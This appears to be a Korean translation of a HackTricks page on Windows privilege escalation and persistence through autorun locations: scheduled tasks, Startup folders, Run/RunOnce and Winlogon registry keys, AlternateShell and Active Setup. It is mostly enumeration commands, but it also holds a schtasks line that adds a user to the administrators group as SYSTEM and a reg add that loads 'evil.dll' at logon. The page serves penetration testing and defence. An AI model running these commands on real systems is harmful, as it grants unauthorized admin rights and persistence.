Autoruns๋ฅผ ์ด์šฉํ•œ ๊ถŒํ•œ ์ƒ์Šน

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

WMIC

Wmic๋Š” ์‹œ์ž‘ ์‹œ ํ”„๋กœ๊ทธ๋žจ์„ ์‹คํ–‰ํ•˜๋Š” ๋ฐ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์‹œ์ž‘ ์‹œ ์‹คํ–‰๋˜๋„๋ก ํ”„๋กœ๊ทธ๋ž˜๋ฐ๋œ ๋ฐ”์ด๋„ˆ๋ฆฌ๋ฅผ ํ™•์ธํ•˜๋ ค๋ฉด:

wmic startup get caption,command 2>nul & ^
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl

Scheduled Tasks

์ž‘์—…์€ ํŠน์ • ๋นˆ๋„๋กœ ์‹คํ–‰๋˜๋„๋ก ์˜ˆ์•ฝํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋‹ค์Œ ๋ช…๋ น์–ด๋กœ ์‹คํ–‰๋˜๋„๋ก ์˜ˆ์•ฝ๋œ ๋ฐ”์ด๋„ˆ๋ฆฌ๋ฅผ ํ™•์ธํ•˜์„ธ์š”:

schtasks /query /fo TABLE /nh | findstr /v /i "disable deshab"
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

#Schtask to give admin access
#You can also write that content on a bat file that is being executed by a scheduled task
schtasks /Create /RU "SYSTEM" /SC ONLOGON /TN "SchedPE" /TR "cmd /c net localgroup administrators user /add"

Folders

๋ชจ๋“  ์‹œ์ž‘ ํด๋”์— ์œ„์น˜ํ•œ ๋ฐ”์ด๋„ˆ๋ฆฌ ํŒŒ์ผ์€ ์‹œ์ž‘ ์‹œ ์‹คํ–‰๋ฉ๋‹ˆ๋‹ค. ์ผ๋ฐ˜์ ์ธ ์‹œ์ž‘ ํด๋”๋Š” ๋‹ค์Œ์— ๋‚˜์—ด๋œ ํด๋”๋“ค์ด์ง€๋งŒ, ์‹œ์ž‘ ํด๋”๋Š” ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์— ํ‘œ์‹œ๋ฉ๋‹ˆ๋‹ค. ์—ฌ๊ธฐ๋ฅผ ์ฝ์–ด ์–ด๋””์ธ์ง€ ์•Œ์•„๋ณด์„ธ์š”.

dir /b "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 2>nul
dir /b "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 2>nul
dir /b "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul
dir /b "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul
Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup"
Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"

์ฐธ๊ณ : ์•„์นด์ด๋ธŒ ์ถ”์ถœ ๊ฒฝ๋กœ ํƒ์ƒ‰ ์ทจ์•ฝ์ (์˜ˆ: WinRAR์—์„œ 7.13 ์ด์ „์— ์•…์šฉ๋œ CVE-2025-8088)์€ ์••์ถ• ํ•ด์ œ ์ค‘ ์ด๋Ÿฌํ•œ ์‹œ์ž‘ ํด๋”์— ํŽ˜์ด๋กœ๋“œ๋ฅผ ์ง์ ‘ ๋ฐฐ์น˜ํ•˜๋Š” ๋ฐ ํ™œ์šฉ๋  ์ˆ˜ ์žˆ์œผ๋ฉฐ, ๋‹ค์Œ ์‚ฌ์šฉ์ž ๋กœ๊ทธ์˜จ ์‹œ ์ฝ”๋“œ ์‹คํ–‰์„ ์ดˆ๋ž˜ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด ๊ธฐ์ˆ ์— ๋Œ€ํ•œ ์‹ฌ์ธต ๋ถ„์„์€ ๋‹ค์Œ์„ ์ฐธ์กฐํ•˜์‹ญ์‹œ์˜ค:

Archive Extraction Path Traversal

๋ ˆ์ง€์ŠคํŠธ๋ฆฌ

Tip

์—ฌ๊ธฐ์—์„œ ์ฐธ๊ณ : Wow6432Node ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ํ•ญ๋ชฉ์€ 64๋น„ํŠธ Windows ๋ฒ„์ „์„ ์‹คํ–‰ํ•˜๊ณ  ์žˆ์Œ์„ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค. ์šด์˜ ์ฒด์ œ๋Š” ์ด ํ‚ค๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ 64๋น„ํŠธ Windows ๋ฒ„์ „์—์„œ ์‹คํ–‰๋˜๋Š” 32๋น„ํŠธ ์‘์šฉ ํ”„๋กœ๊ทธ๋žจ์— ๋Œ€ํ•œ HKEY_LOCAL_MACHINE\SOFTWARE์˜ ๋ณ„๋„ ๋ณด๊ธฐ๋ฅผ ํ‘œ์‹œํ•ฉ๋‹ˆ๋‹ค.

์‹คํ–‰

์ผ๋ฐ˜์ ์œผ๋กœ ์•Œ๋ ค์ง„ AutoRun ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ:

  • HKLM\Software\Microsoft\Windows\CurrentVersion\Run
  • HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
  • HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
  • HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  • HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
  • HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
  • HKCU\Software\Wow6432Npde\Microsoft\Windows\CurrentVersion\RunOnce
  • HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run
  • HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Runonce
  • HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunonceEx

Run ๋ฐ RunOnce๋กœ ์•Œ๋ ค์ง„ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ํ‚ค๋Š” ์‚ฌ์šฉ์ž๊ฐ€ ์‹œ์Šคํ…œ์— ๋กœ๊ทธ์ธํ•  ๋•Œ๋งˆ๋‹ค ํ”„๋กœ๊ทธ๋žจ์„ ์ž๋™์œผ๋กœ ์‹คํ–‰ํ•˜๋„๋ก ์„ค๊ณ„๋˜์—ˆ์Šต๋‹ˆ๋‹ค. ํ‚ค์˜ ๋ฐ์ดํ„ฐ ๊ฐ’์œผ๋กœ ํ• ๋‹น๋œ ๋ช…๋ น์ค„์€ 260์ž ์ดํ•˜๋กœ ์ œํ•œ๋ฉ๋‹ˆ๋‹ค.

์„œ๋น„์Šค ์‹คํ–‰ (๋ถ€ํŒ… ์ค‘ ์„œ๋น„์Šค์˜ ์ž๋™ ์‹œ์ž‘์„ ์ œ์–ดํ•  ์ˆ˜ ์žˆ์Œ):

  • HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
  • HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
  • HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
  • HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
  • HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce
  • HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce
  • HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices
  • HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices

RunOnceEx:

  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
  • HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceEx

Windows Vista ๋ฐ ์ดํ›„ ๋ฒ„์ „์—์„œ๋Š” Run ๋ฐ RunOnce ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ํ‚ค๊ฐ€ ์ž๋™์œผ๋กœ ์ƒ์„ฑ๋˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ํ‚ค์˜ ํ•ญ๋ชฉ์€ ํ”„๋กœ๊ทธ๋žจ์„ ์ง์ ‘ ์‹œ์ž‘ํ•˜๊ฑฐ๋‚˜ ์ข…์†์„ฑ์œผ๋กœ ์ง€์ •ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์˜ˆ๋ฅผ ๋“ค์–ด, ๋กœ๊ทธ์˜จ ์‹œ DLL ํŒŒ์ผ์„ ๋กœ๋“œํ•˜๋ ค๋ฉด RunOnceEx ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ํ‚ค์™€ โ€œDependโ€ ํ‚ค๋ฅผ ํ•จ๊ป˜ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Š” ์‹œ์Šคํ…œ ์‹œ์ž‘ ์‹œ โ€œC:\temp\evil.dllโ€œ์„ ์‹คํ–‰ํ•˜๋„๋ก ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ํ•ญ๋ชฉ์„ ์ถ”๊ฐ€ํ•˜์—ฌ ๋ณด์—ฌ์ค๋‹ˆ๋‹ค:

reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d "C:\\temp\\evil.dll"

Tip

Exploit 1: HKLM ๋‚ด์˜ ์–ธ๊ธ‰๋œ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ์ค‘ ์–ด๋А ๊ณณ์—๋“  ์“ธ ์ˆ˜ ์žˆ๋‹ค๋ฉด, ๋‹ค๋ฅธ ์‚ฌ์šฉ์ž๊ฐ€ ๋กœ๊ทธ์ธํ•  ๋•Œ ๊ถŒํ•œ์„ ์ƒ์Šน์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Tip

Exploit 2: HKLM ๋‚ด์˜ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ์ค‘ ์–ด๋А ๊ณณ์—๋“  ํ‘œ์‹œ๋œ ์ด์ง„ ํŒŒ์ผ์„ ๋ฎ์–ด์“ธ ์ˆ˜ ์žˆ๋‹ค๋ฉด, ๋‹ค๋ฅธ ์‚ฌ์šฉ์ž๊ฐ€ ๋กœ๊ทธ์ธํ•  ๋•Œ ํ•ด๋‹น ์ด์ง„ ํŒŒ์ผ์„ ๋ฐฑ๋„์–ด๋กœ ์ˆ˜์ •ํ•˜๊ณ  ๊ถŒํ•œ์„ ์ƒ์Šน์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

#CMD
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunE

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices
reg query HKCU\Software\Wow5432Node\Microsoft\Windows\CurrentVersion\RunServices

reg query HKLM\Software\Microsoft\Windows\RunOnceEx
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\RunOnceEx
reg query HKCU\Software\Microsoft\Windows\RunOnceEx
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\RunOnceEx

#PowerShell
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunE'

Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices'

Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\RunOnceEx'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\RunOnceEx'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\RunOnceEx'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\RunOnceEx'

Startup Path

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

Startup ํด๋”์— ๋ฐฐ์น˜๋œ ๋ฐ”๋กœ ๊ฐ€๊ธฐ๋Š” ์‚ฌ์šฉ์ž ๋กœ๊ทธ์˜จ ๋˜๋Š” ์‹œ์Šคํ…œ ์žฌ๋ถ€ํŒ… ์ค‘์— ์„œ๋น„์Šค๋‚˜ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์„ ์ž๋™์œผ๋กœ ์‹คํ–‰ํ•ฉ๋‹ˆ๋‹ค. Startup ํด๋”์˜ ์œ„์น˜๋Š” Local Machine ๋ฐ Current User ๋ฒ”์œ„์— ๋Œ€ํ•ด ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์—์„œ ์ •์˜๋ฉ๋‹ˆ๋‹ค. ์ด๋Š” ์ด๋Ÿฌํ•œ ์ง€์ •๋œ Startup ์œ„์น˜์— ์ถ”๊ฐ€๋œ ๋ชจ๋“  ๋ฐ”๋กœ ๊ฐ€๊ธฐ๊ฐ€ ๋กœ๊ทธ์˜จ ๋˜๋Š” ์žฌ๋ถ€ํŒ… ํ”„๋กœ์„ธ์Šค ํ›„์— ์—ฐ๊ฒฐ๋œ ์„œ๋น„์Šค๋‚˜ ํ”„๋กœ๊ทธ๋žจ์ด ์‹œ์ž‘๋˜๋„๋ก ๋ณด์žฅํ•จ์„ ์˜๋ฏธํ•˜๋ฉฐ, ํ”„๋กœ๊ทธ๋žจ์„ ์ž๋™์œผ๋กœ ์‹คํ–‰ํ•˜๋„๋ก ์˜ˆ์•ฝํ•˜๋Š” ๊ฐ„๋‹จํ•œ ๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค.

Tip

HKLM ์•„๋ž˜์˜ [User] Shell Folder๋ฅผ ๋ฎ์–ด์“ธ ์ˆ˜ ์žˆ๋‹ค๋ฉด, ์ด๋ฅผ ๋‹น์‹ ์ด ์ œ์–ดํ•˜๋Š” ํด๋”๋กœ ์ง€์ •ํ•˜๊ณ  ์‚ฌ์šฉ์ž๊ฐ€ ์‹œ์Šคํ…œ์— ๋กœ๊ทธ์ธํ•  ๋•Œ๋งˆ๋‹ค ์‹คํ–‰๋  ๋ฐฑ๋„์–ด๋ฅผ ๋ฐฐ์น˜ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v "Common Startup"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Common Startup"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Common Startup"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v "Common Startup"

Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' -Name "Common Startup"
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders' -Name "Common Startup"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders' -Name "Common Startup"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' -Name "Common Startup"

Winlogon Keys

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

์ผ๋ฐ˜์ ์œผ๋กœ Userinit ํ‚ค๋Š” userinit.exe๋กœ ์„ค์ •๋ฉ๋‹ˆ๋‹ค. ๊ทธ๋Ÿฌ๋‚˜ ์ด ํ‚ค๊ฐ€ ์ˆ˜์ •๋˜๋ฉด, ์ง€์ •๋œ ์‹คํ–‰ ํŒŒ์ผ์ด ์‚ฌ์šฉ์ž ๋กœ๊ทธ์˜จ ์‹œ Winlogon์— ์˜ํ•ด ์‹คํ–‰๋ฉ๋‹ˆ๋‹ค. ์œ ์‚ฌํ•˜๊ฒŒ, Shell ํ‚ค๋Š” Windows์˜ ๊ธฐ๋ณธ ์…ธ์ธ explorer.exe๋ฅผ ๊ฐ€๋ฆฌํ‚ค๋„๋ก ์„ค์ •๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค.

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Userinit"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Shell"

Tip

๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ๊ฐ’์„ ๋ฎ์–ด์“ฐ๊ฑฐ๋‚˜ ์ด์ง„ ํŒŒ์ผ์„ ๋ฎ์–ด์“ธ ์ˆ˜ ์žˆ๋‹ค๋ฉด ๊ถŒํ•œ์„ ์ƒ์Šน์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์ •์ฑ… ์„ค์ •

  • HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

์‹คํ–‰ ํ‚ค๋ฅผ ํ™•์ธํ•˜์„ธ์š”.

reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "Run"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "Run"
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer' -Name "Run"
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer' -Name "Run"

AlternateShell

์•ˆ์ „ ๋ชจ๋“œ ๋ช…๋ น ํ”„๋กฌํ”„ํŠธ ๋ณ€๊ฒฝ

Windows ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์˜ HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot ์•„๋ž˜์— ๊ธฐ๋ณธ์ ์œผ๋กœ cmd.exe๋กœ ์„ค์ •๋œ AlternateShell ๊ฐ’์ด ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Š” ์‹œ์ž‘ ์‹œ โ€œ๋ช…๋ น ํ”„๋กฌํ”„ํŠธ๊ฐ€ ์žˆ๋Š” ์•ˆ์ „ ๋ชจ๋“œโ€œ๋ฅผ ์„ ํƒํ•  ๋•Œ (F8์„ ๋ˆŒ๋Ÿฌ์„œ) cmd.exe๊ฐ€ ์‚ฌ์šฉ๋œ๋‹ค๋Š” ๊ฒƒ์„ ์˜๋ฏธํ•ฉ๋‹ˆ๋‹ค. ๊ทธ๋Ÿฌ๋‚˜ F8์„ ๋ˆ„๋ฅด๊ณ  ์ˆ˜๋™์œผ๋กœ ์„ ํƒํ•  ํ•„์š” ์—†์ด ์ด ๋ชจ๋“œ์—์„œ ์ž๋™์œผ๋กœ ์‹œ์ž‘ํ•˜๋„๋ก ์ปดํ“จํ„ฐ๋ฅผ ์„ค์ •ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

โ€œ๋ช…๋ น ํ”„๋กฌํ”„ํŠธ๊ฐ€ ์žˆ๋Š” ์•ˆ์ „ ๋ชจ๋“œโ€œ์—์„œ ์ž๋™์œผ๋กœ ์‹œ์ž‘ํ•˜๊ธฐ ์œ„ํ•œ ๋ถ€ํŒ… ์˜ต์…˜์„ ๋งŒ๋“œ๋Š” ๋‹จ๊ณ„:

  1. boot.ini ํŒŒ์ผ์˜ ์†์„ฑ์„ ๋ณ€๊ฒฝํ•˜์—ฌ ์ฝ๊ธฐ ์ „์šฉ, ์‹œ์Šคํ…œ ๋ฐ ์ˆจ๊น€ ํ”Œ๋ž˜๊ทธ๋ฅผ ์ œ๊ฑฐํ•ฉ๋‹ˆ๋‹ค: attrib c:\boot.ini -r -s -h
  2. ํŽธ์ง‘์„ ์œ„ํ•ด boot.ini๋ฅผ ์—ฝ๋‹ˆ๋‹ค.
  3. ๋‹ค์Œ๊ณผ ๊ฐ™์€ ์ค„์„ ์‚ฝ์ž…ํ•ฉ๋‹ˆ๋‹ค: multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /SAFEBOOT:MINIMAL(ALTERNATESHELL)
  4. boot.ini์— ๋Œ€ํ•œ ๋ณ€๊ฒฝ ์‚ฌํ•ญ์„ ์ €์žฅํ•ฉ๋‹ˆ๋‹ค.
  5. ์›๋ž˜ ํŒŒ์ผ ์†์„ฑ์„ ๋‹ค์‹œ ์ ์šฉํ•ฉ๋‹ˆ๋‹ค: attrib c:\boot.ini +r +s +h
  • Exploit 1: AlternateShell ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ํ‚ค๋ฅผ ๋ณ€๊ฒฝํ•˜๋ฉด ์‚ฌ์šฉ์ž ์ •์˜ ๋ช…๋ น ์…ธ ์„ค์ •์ด ๊ฐ€๋Šฅํ•ด์ ธ, ๋ฌด๋‹จ ์ ‘๊ทผ์ด ๋ฐœ์ƒํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
  • Exploit 2 (PATH ์“ฐ๊ธฐ ๊ถŒํ•œ): ์‹œ์Šคํ…œ PATH ๋ณ€์ˆ˜์˜ ์–ด๋–ค ๋ถ€๋ถ„์—๋“  ์“ฐ๊ธฐ ๊ถŒํ•œ์ด ์žˆ๋Š” ๊ฒฝ์šฐ, ํŠนํžˆ C:\Windows\system32 ์ด์ „์—, ์‚ฌ์šฉ์ž ์ •์˜ cmd.exe๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์œผ๋ฉฐ, ์ด๋Š” ์‹œ์Šคํ…œ์ด ์•ˆ์ „ ๋ชจ๋“œ์—์„œ ์‹œ์ž‘๋  ๊ฒฝ์šฐ ๋ฐฑ๋„์–ด๊ฐ€ ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
  • Exploit 3 (PATH ๋ฐ boot.ini ์“ฐ๊ธฐ ๊ถŒํ•œ): boot.ini์— ๋Œ€ํ•œ ์“ฐ๊ธฐ ์ ‘๊ทผ์ด ๊ฐ€๋Šฅํ•˜๋ฉด ์ž๋™ ์•ˆ์ „ ๋ชจ๋“œ ์‹œ์ž‘์ด ๊ฐ€๋Šฅํ•ด์ ธ, ๋‹ค์Œ ์žฌ๋ถ€ํŒ… ์‹œ ๋ฌด๋‹จ ์ ‘๊ทผ์„ ์šฉ์ดํ•˜๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค.

ํ˜„์žฌ AlternateShell ์„ค์ •์„ ํ™•์ธํ•˜๋ ค๋ฉด ๋‹ค์Œ ๋ช…๋ น์„ ์‚ฌ์šฉํ•˜์„ธ์š”:

reg query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot /v AlternateShell
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot' -Name 'AlternateShell'

์„ค์น˜๋œ ๊ตฌ์„ฑ ์š”์†Œ

Active Setup์€ Windows์˜ ๊ธฐ๋Šฅ์œผ๋กœ, ๋ฐ”ํƒ• ํ™”๋ฉด ํ™˜๊ฒฝ์ด ์™„์ „ํžˆ ๋กœ๋“œ๋˜๊ธฐ ์ „์— ์‹œ์ž‘๋ฉ๋‹ˆ๋‹ค. ์ด๋Š” ํŠน์ • ๋ช…๋ น์˜ ์‹คํ–‰์„ ์šฐ์„ ์‹œํ•˜๋ฉฐ, ์‚ฌ์šฉ์ž ๋กœ๊ทธ์˜จ์ด ์ง„ํ–‰๋˜๊ธฐ ์ „์— ์™„๋ฃŒ๋˜์–ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. ์ด ๊ณผ์ •์€ Run ๋˜๋Š” RunOnce ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ์„น์…˜๊ณผ ๊ฐ™์€ ๋‹ค๋ฅธ ์‹œ์ž‘ ํ•ญ๋ชฉ์ด ํŠธ๋ฆฌ๊ฑฐ๋˜๊ธฐ ์ „์—๋„ ๋ฐœ์ƒํ•ฉ๋‹ˆ๋‹ค.

Active Setup์€ ๋‹ค์Œ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ํ‚ค๋ฅผ ํ†ตํ•ด ๊ด€๋ฆฌ๋ฉ๋‹ˆ๋‹ค:

  • HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components
  • HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components
  • HKCU\SOFTWARE\Microsoft\Active Setup\Installed Components
  • HKCU\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components

